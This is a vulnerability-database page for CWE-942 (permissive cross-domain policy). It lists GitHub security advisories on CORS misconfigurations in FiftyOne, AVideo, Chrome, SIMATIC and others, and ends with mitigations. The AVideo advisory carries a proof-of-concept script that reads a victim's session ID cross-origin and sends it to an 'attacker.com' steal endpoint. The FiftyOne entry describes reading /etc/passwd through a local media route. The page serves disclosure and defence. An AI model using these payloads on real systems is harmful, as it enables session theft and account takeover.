CWE-942
AllowedPermissive Cross-domain Security Policy with Untrusted Domains
Abstraction: Variant · Status: Incomplete
The product uses a web-client protection mechanism such as a Content Security Policy (CSP) or cross-domain policy file, but the policy includes untrusted domains with which the web client is allowed to communicate.
178 vulnerabilities reference this CWE, most recent first.
GHSA-P88C-M6M4-2897
Vulnerability from github – Published: 2025-10-02 15:31 – Updated: 2025-10-02 15:31Incorrect Cross-Origin Resource Sharing (CORS) configuration in Hiberus Sintra. Cross-Origin Resource Sharing (CORS) allows browsers to make cross-domain requests in a controlled manner. This request has an “Origin” header that identifies the domain making the initial request and defines the protocol between a browser and a server to see if the request is allowed. An attacker can exploit this and potentially perform privileged actions and access confidential information when Access-Control-Allow-Credentials is enabled.
{
"affected": [],
"aliases": [
"CVE-2025-41010"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-02T13:15:31Z",
"severity": "MODERATE"
},
"details": "Incorrect Cross-Origin Resource Sharing (CORS) configuration in Hiberus Sintra. Cross-Origin Resource Sharing (CORS) allows browsers to make cross-domain requests in a controlled manner. This request has an \u201cOrigin\u201d header that identifies the domain making the initial request and defines the protocol between a browser and a server to see if the request is allowed. An attacker can exploit this and potentially perform privileged actions and access confidential information when Access-Control-Allow-Credentials is enabled.",
"id": "GHSA-p88c-m6m4-2897",
"modified": "2025-10-02T15:31:16Z",
"published": "2025-10-02T15:31:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41010"
},
{
"type": "WEB",
"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/cross-origin-resource-sharing-cors-hiberus-sintra"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-PRQW-X27X-86H2
Vulnerability from github – Published: 2024-05-14 15:32 – Updated: 2024-05-14 15:32HCL DRYiCE Lucy (now AEX) is affected by a Cross Origin Resource Sharing (CORS) vulnerability. The mobile app is vulnerable to a CORS misconfiguration which could potentially allow unauthorized access to the application resources from any web domain and enable cache poisoning attacks.
{
"affected": [],
"aliases": [
"CVE-2023-37526"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-14T13:20:18Z",
"severity": "MODERATE"
},
"details": "HCL DRYiCE Lucy (now AEX) is affected by a Cross Origin Resource Sharing (CORS) vulnerability. The mobile app is vulnerable to a CORS misconfiguration which could potentially allow unauthorized access to the application resources from any web domain and enable cache poisoning attacks.\n",
"id": "GHSA-prqw-x27x-86h2",
"modified": "2024-05-14T15:32:50Z",
"published": "2024-05-14T15:32:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37526"
},
{
"type": "WEB",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0113032"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-Q2FW-2Q69-QH7P
Vulnerability from github – Published: 2025-06-06 12:30 – Updated: 2025-06-06 12:30In IDF v0.10.0-0C03-03 and ZLF v0.10.0-0C03-04, a configuration error has been detected in cross-origin resource sharing (CORS). Exploiting this vulnerability requires authenticating to the device and executing certain commands that can be executed with view permission.
{
"affected": [],
"aliases": [
"CVE-2025-41363"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-06T12:15:22Z",
"severity": "MODERATE"
},
"details": "In IDF v0.10.0-0C03-03 and ZLF v0.10.0-0C03-04, a configuration error has been detected in cross-origin resource sharing (CORS). Exploiting this vulnerability requires authenticating to the device and executing certain commands that can be executed with view permission.",
"id": "GHSA-q2fw-2q69-qh7p",
"modified": "2025-06-06T12:30:33Z",
"published": "2025-06-06T12:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41363"
},
{
"type": "WEB",
"url": "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-zivs-idf-and-zlf-products"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-Q78P-HJ9H-5466
Vulnerability from github – Published: 2026-07-15 21:57 – Updated: 2026-07-15 21:57Impact
The FiftyOne App/API server (fiftyone/server/app.py) and the /media route (fiftyone/server/routes/media.py) unconditionally set a permissive CORS header (Access-Control-Allow-Origin: *) on their responses. Because the embedded App server runs locally and is unauthenticated, this allows any website a user visits to make cross-origin requests to that user's running FiftyOne server and read the responses.
Combined with the unauthenticated /media endpoint — which serves files from the local filesystem by path — the wildcard CORS policy turns a local-only file read into a remotely exploitable, drive-by data exfiltration vulnerability. A malicious web page can silently issue requests such as http://localhost:5151/media?filepath=/etc/passwd and read arbitrary files accessible to the server process (SSH keys, cloud credentials, .env files, dataset media, etc.), then exfiltrate them to an attacker-controlled endpoint.
The victim only needs to have a FiftyOne server running locally and visit a malicious page — no clicks or other interaction are required. Browsers that have shipped Private Network Access / local-network-access protections (e.g. Chromium 142+) mitigate this for some users, but Safari and Firefox do not yet, so the attack remains viable in common configurations.
Who is impacted: any user running FiftyOne (the open-source, embedded App server) locally while also browsing the web.
Not affected: media stored in cloud buckets, which is served via signed URLs on a separate origin.
Patches
Fixed in FiftyOne 1.17.0. The hard-coded Access-Control-Allow-Origin: * has been removed and the server now responds same-origin only by default, which covers local desktop usage and the supported notebook integrations (each served through a same-origin proxy or iframe).
Cross-origin access is now opt-in via a new allowed_origins config option (environment variable FIFTYONE_ALLOWED_ORIGINS), an explicit comma-separated list of trusted origins, e.g.:
export FIFTYONE_ALLOWED_ORIGINS='https://app.example.com,http://localhost:3000'
The literal value * restores the legacy wildcard behavior for users who explicitly require it and emits a warning.
Users should upgrade to FiftyOne 1.17.0 or later.
Workarounds
In affected versions there is no configuration flag to disable the wildcard CORS header without upgrading. Until you can upgrade:
- Do not run the FiftyOne App server while browsing untrusted websites.
- Keep the App server bound to
localhost(the default) and avoid exposing it on a network interface. - Use a browser that enforces Private Network Access protections.
Resources
- OWASP A01:2025 – Broken Access Control: https://owasp.org/Top10/2025/A01_2025-Broken_Access_Control/
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "fiftyone"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.17.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-53656"
],
"database_specific": {
"cwe_ids": [
"CWE-346",
"CWE-942"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-15T21:57:29Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Impact\n\nThe FiftyOne App/API server (`fiftyone/server/app.py`) and the `/media` route (`fiftyone/server/routes/media.py`) unconditionally set a permissive CORS header (`Access-Control-Allow-Origin: *`) on their responses. Because the embedded App server runs locally and is unauthenticated, this allows **any website a user visits to make cross-origin requests to that user\u0027s running FiftyOne server and read the responses**.\n\nCombined with the unauthenticated `/media` endpoint \u2014 which serves files from the local filesystem by path \u2014 the wildcard CORS policy turns a local-only file read into a **remotely exploitable, drive-by data exfiltration** vulnerability. A malicious web page can silently issue requests such as `http://localhost:5151/media?filepath=/etc/passwd` and read arbitrary files accessible to the server process (SSH keys, cloud credentials, `.env` files, dataset media, etc.), then exfiltrate them to an attacker-controlled endpoint.\n\nThe victim only needs to have a FiftyOne server running locally and visit a malicious page \u2014 no clicks or other interaction are required. Browsers that have shipped Private Network Access / local-network-access protections (e.g. Chromium 142+) mitigate this for some users, but Safari and Firefox do not yet, so the attack remains viable in common configurations.\n\n**Who is impacted:** any user running FiftyOne (the open-source, embedded App server) locally while also browsing the web.\n\n**Not affected:** media stored in cloud buckets, which is served via signed URLs on a separate origin.\n\n### Patches\n\nFixed in **FiftyOne 1.17.0**. The hard-coded `Access-Control-Allow-Origin: *` has been removed and the server now responds **same-origin only by default**, which covers local desktop usage and the supported notebook integrations (each served through a same-origin proxy or iframe).\n\nCross-origin access is now opt-in via a new `allowed_origins` config option (environment variable `FIFTYONE_ALLOWED_ORIGINS`), an explicit comma-separated list of trusted origins, e.g.:\n\n```shell\nexport FIFTYONE_ALLOWED_ORIGINS=\u0027https://app.example.com,http://localhost:3000\u0027\n```\n\nThe literal value `*` restores the legacy wildcard behavior for users who explicitly require it and emits a warning.\n\n**Users should upgrade to FiftyOne 1.17.0 or later.**\n\n### Workarounds\n\nIn affected versions there is no configuration flag to disable the wildcard CORS header without upgrading. Until you can upgrade:\n\n- Do not run the FiftyOne App server while browsing untrusted websites.\n- Keep the App server bound to `localhost` (the default) and avoid exposing it on a network interface.\n- Use a browser that enforces Private Network Access protections.\n\n### Resources\n\n- OWASP A01:2025 \u2013 Broken Access Control: https://owasp.org/Top10/2025/A01_2025-Broken_Access_Control/",
"id": "GHSA-q78p-hj9h-5466",
"modified": "2026-07-15T21:57:29Z",
"published": "2026-07-15T21:57:29Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/voxel51/fiftyone/security/advisories/GHSA-q78p-hj9h-5466"
},
{
"type": "WEB",
"url": "https://github.com/voxel51/fiftyone/commit/7c5b92eec5c7c0210c0c8134351ced77d2800ae0"
},
{
"type": "PACKAGE",
"url": "https://github.com/voxel51/fiftyone"
},
{
"type": "WEB",
"url": "https://github.com/voxel51/fiftyone/releases/tag/v1.17.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "FiftyOne App server uses wildcard CORS (Access-Control-Allow-Origin: *), enabling cross-origin reads of local server data"
}
GHSA-QC3P-398R-P59J
Vulnerability from github – Published: 2026-03-17 19:52 – Updated: 2026-03-20 21:23Summary
/objects/phpsessionid.json.php exposes the current PHP session ID to any unauthenticated request. The allowOrigin() function reflects any Origin header back in Access-Control-Allow-Origin with Access-Control-Allow-Credentials: true, enabling cross-origin session theft and full account takeover.
Details
File: objects/phpsessionid.json.php
allowOrigin();
$obj = new stdClass();
$obj->phpsessid = session_id();
echo _json_encode($obj);
No authentication is required. The allowOrigin() function in objects/functions.php (line ~2648) reflects the request Origin:
$HTTP_ORIGIN = empty($_SERVER['HTTP_ORIGIN']) ? @$_SERVER['HTTP_REFERER'] : $_SERVER['HTTP_ORIGIN'];
header("Access-Control-Allow-Origin: " . $HTTP_ORIGIN);
header("Access-Control-Allow-Credentials: true");
This means any external website can make a credentialed cross-origin request and read the session ID.
PoC
An attacker hosts the following page:
<script>
fetch('https://TARGET/objects/phpsessionid.json.php', {
credentials: 'include'
})
.then(r => r.json())
.then(d => {
// d.phpsessid = victim's session ID
document.location = 'https://attacker.com/steal?sid=' + d.phpsessid;
});
</script>
When a logged-in AVideo user visits the attacker's page, their PHP session ID is stolen via the permissive CORS policy, allowing the attacker to hijack their session.
Impact
Account Takeover — Any logged-in user (including administrators) who visits an attacker-controlled page will have their session stolen. The attacker can then impersonate them with full privileges.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "wwbn/avideo"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "25.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33043"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-17T19:52:28Z",
"nvd_published_at": "2026-03-20T06:16:12Z",
"severity": "HIGH"
},
"details": "### Summary\n\n`/objects/phpsessionid.json.php` exposes the current PHP session ID to any unauthenticated request. The `allowOrigin()` function reflects any `Origin` header back in `Access-Control-Allow-Origin` with `Access-Control-Allow-Credentials: true`, enabling cross-origin session theft and full account takeover.\n\n### Details\n\n**File:** `objects/phpsessionid.json.php`\n\n```php\nallowOrigin();\n$obj = new stdClass();\n$obj-\u003ephpsessid = session_id();\necho _json_encode($obj);\n```\n\nNo authentication is required. The `allowOrigin()` function in `objects/functions.php` (line ~2648) reflects the request Origin:\n\n```php\n$HTTP_ORIGIN = empty($_SERVER[\u0027HTTP_ORIGIN\u0027]) ? @$_SERVER[\u0027HTTP_REFERER\u0027] : $_SERVER[\u0027HTTP_ORIGIN\u0027];\nheader(\"Access-Control-Allow-Origin: \" . $HTTP_ORIGIN);\nheader(\"Access-Control-Allow-Credentials: true\");\n```\n\nThis means any external website can make a credentialed cross-origin request and read the session ID.\n\n### PoC\n\nAn attacker hosts the following page:\n\n```html\n\u003cscript\u003e\nfetch(\u0027https://TARGET/objects/phpsessionid.json.php\u0027, {\n credentials: \u0027include\u0027\n})\n.then(r =\u003e r.json())\n.then(d =\u003e {\n // d.phpsessid = victim\u0027s session ID\n document.location = \u0027https://attacker.com/steal?sid=\u0027 + d.phpsessid;\n});\n\u003c/script\u003e\n```\n\nWhen a logged-in AVideo user visits the attacker\u0027s page, their PHP session ID is stolen via the permissive CORS policy, allowing the attacker to hijack their session.\n\n### Impact\n\n**Account Takeover** \u2014 Any logged-in user (including administrators) who visits an attacker-controlled page will have their session stolen. The attacker can then impersonate them with full privileges.",
"id": "GHSA-qc3p-398r-p59j",
"modified": "2026-03-20T21:23:00Z",
"published": "2026-03-17T19:52:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-qc3p-398r-p59j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33043"
},
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/commit/9f4f51e5df5e3343400f9d0068705f5482b6f930"
},
{
"type": "PACKAGE",
"url": "https://github.com/WWBN/AVideo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "AVideo affected by Session Hijacking via Unauthenticated Session ID Disclosure with Permissive CORS"
}
GHSA-QGRP-RJ4F-64XH
Vulnerability from github – Published: 2026-05-14 21:30 – Updated: 2026-05-15 15:30Inappropriate implementation in CORS in Google Chrome on Linux and ChromeOS prior to 148.0.7778.168 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)
{
"affected": [],
"aliases": [
"CVE-2026-8576"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-14T20:17:19Z",
"severity": "MODERATE"
},
"details": "Inappropriate implementation in CORS in Google Chrome on Linux and ChromeOS prior to 148.0.7778.168 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)",
"id": "GHSA-qgrp-rj4f-64xh",
"modified": "2026-05-15T15:30:40Z",
"published": "2026-05-14T21:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8576"
},
{
"type": "WEB",
"url": "https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_12.html"
},
{
"type": "WEB",
"url": "https://issues.chromium.org/issues/496231853"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-QGVX-GH8H-GMQJ
Vulnerability from github – Published: 2023-11-14 12:30 – Updated: 2023-11-14 12:30A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1). When accessing the Information Server from affected products, the products use an overly permissive CORS policy. This could allow an attacker to trick a legitimate user to trigger unwanted behavior.
{
"affected": [],
"aliases": [
"CVE-2023-46098"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-14T11:15:14Z",
"severity": "HIGH"
},
"details": "A vulnerability has been identified in SIMATIC PCS neo (All versions \u003c V4.1). When accessing the Information Server from affected products, the products use an overly permissive CORS policy. This could allow an attacker to trick a legitimate user to trigger unwanted behavior.",
"id": "GHSA-qgvx-gh8h-gmqj",
"modified": "2023-11-14T12:30:27Z",
"published": "2023-11-14T12:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46098"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-456933.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-R863-5PGM-C8G4
Vulnerability from github – Published: 2026-05-29 09:31 – Updated: 2026-05-29 09:31CORS misconfiguration in the REST API of Network Optix Nx Witness VMS before version 6.1.2, when running in the default Standard security mode, on Linux and Windows allows an unauthenticated remote attacker to steal the session token of an authenticated user and perform Administrator Account Takeover via a malicious cross-origin web page visited by the victim. The High security mode is not affected.Workaround:
For existing installations running in Standard security mode, set Access-Control-Allow-Credentials to false via the REST API: PATCH /rest/v2/system/settings with body {"supportedOrigins": "null"}. Alternatively, select High security level during initial setup.
Solution:
Update to Nx Witness VMS version 6.1.2 or later, in which Access-Control-Allow-Credentials is set to false in the default Standard security configuration.
{
"affected": [],
"aliases": [
"CVE-2026-10056"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-29T09:16:17Z",
"severity": "HIGH"
},
"details": "CORS misconfiguration in the REST API of Network Optix Nx Witness VMS before version 6.1.2, when running in the default Standard security mode, on Linux and Windows allows an unauthenticated remote attacker to steal the session token of an authenticated user and perform Administrator Account Takeover via a malicious cross-origin web page visited by the victim. The High security mode is not affected.Workaround:\n\nFor existing installations running in Standard security mode, set Access-Control-Allow-Credentials to false via the REST API: PATCH /rest/v2/system/settings with body {\"supportedOrigins\": \"null\"}. Alternatively, select High security level during initial setup.\n\nSolution:\n\nUpdate to Nx Witness VMS version 6.1.2 or later, in which Access-Control-Allow-Credentials is set to false in the default Standard security configuration.",
"id": "GHSA-r863-5pgm-c8g4",
"modified": "2026-05-29T09:31:05Z",
"published": "2026-05-29T09:31:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-10056"
},
{
"type": "WEB",
"url": "https://support.networkoptix.com/hc/en-us/articles/39254208939159-How-to-Enable-CORS-Validation"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RQG6-587C-H9V3
Vulnerability from github – Published: 2025-06-16 12:30 – Updated: 2025-06-16 12:30An unauthenticated remote attacker can take advantage of the current overly permissive CORS policy to gain access and read the responses, potentially exposing sensitive data or enabling further attacks.
{
"affected": [],
"aliases": [
"CVE-2025-25264"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-16T10:15:19Z",
"severity": "HIGH"
},
"details": "An unauthenticated remote attacker can take advantage of the current overly permissive CORS policy to gain access and read the responses, potentially exposing sensitive data or enabling further attacks.",
"id": "GHSA-rqg6-587c-h9v3",
"modified": "2025-06-16T12:30:25Z",
"published": "2025-06-16T12:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25264"
},
{
"type": "WEB",
"url": "https://certvde.com/en/advisories/VDE-2025-018"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-V9W2-V7J9-RJPR
Vulnerability from github – Published: 2021-09-02 22:02 – Updated: 2021-09-13 20:27In Eclipse Theia 0.3.9 to 1.8.1, the "mini-browser" extension allows a user to preview HTML files in an iframe inside the IDE. But with the way it is made it is possible for a previewed HTML file to trigger an RCE. This exploit only happens if a user previews a malicious file.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@theia/mini-browser"
},
"ranges": [
{
"events": [
{
"introduced": "0.3.9"
},
{
"fixed": "1.9.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-34435"
],
"database_specific": {
"cwe_ids": [
"CWE-346",
"CWE-668",
"CWE-942"
],
"github_reviewed": true,
"github_reviewed_at": "2021-09-02T17:12:13Z",
"nvd_published_at": "2021-09-01T18:15:00Z",
"severity": "HIGH"
},
"details": "In Eclipse Theia 0.3.9 to 1.8.1, the \"mini-browser\" extension allows a user to preview HTML files in an iframe inside the IDE. But with the way it is made it is possible for a previewed HTML file to trigger an RCE. This exploit only happens if a user previews a malicious file.",
"id": "GHSA-v9w2-v7j9-rjpr",
"modified": "2021-09-13T20:27:30Z",
"published": "2021-09-02T22:02:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34435"
},
{
"type": "WEB",
"url": "https://github.com/eclipse-theia/theia/pull/8759"
},
{
"type": "WEB",
"url": "https://github.com/eclipse-theia/theia/commit/0761dcf5fe3c14c27432683d42d2c526ad0cfbd5"
},
{
"type": "WEB",
"url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=568018"
},
{
"type": "PACKAGE",
"url": "https://github.com/eclipse-theia/theia"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Remote code execution in Eclipse Theia"
}
Mitigation
Strategy: Attack Surface Reduction
Define a restrictive Content Security Policy [REF-1486] or cross-domain policy file.
Mitigation
Strategy: Attack Surface Reduction
Avoid using wildcards in the CSP / cross-domain policy file. Any domain matching the wildcard expression will be implicitly trusted, and can perform two-way interaction with the target server.
Mitigation
Strategy: Environment Hardening
For Flash, modify crossdomain.xml to use meta-policy options such as 'master-only' or 'none' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server.
No CAPEC attack patterns related to this CWE.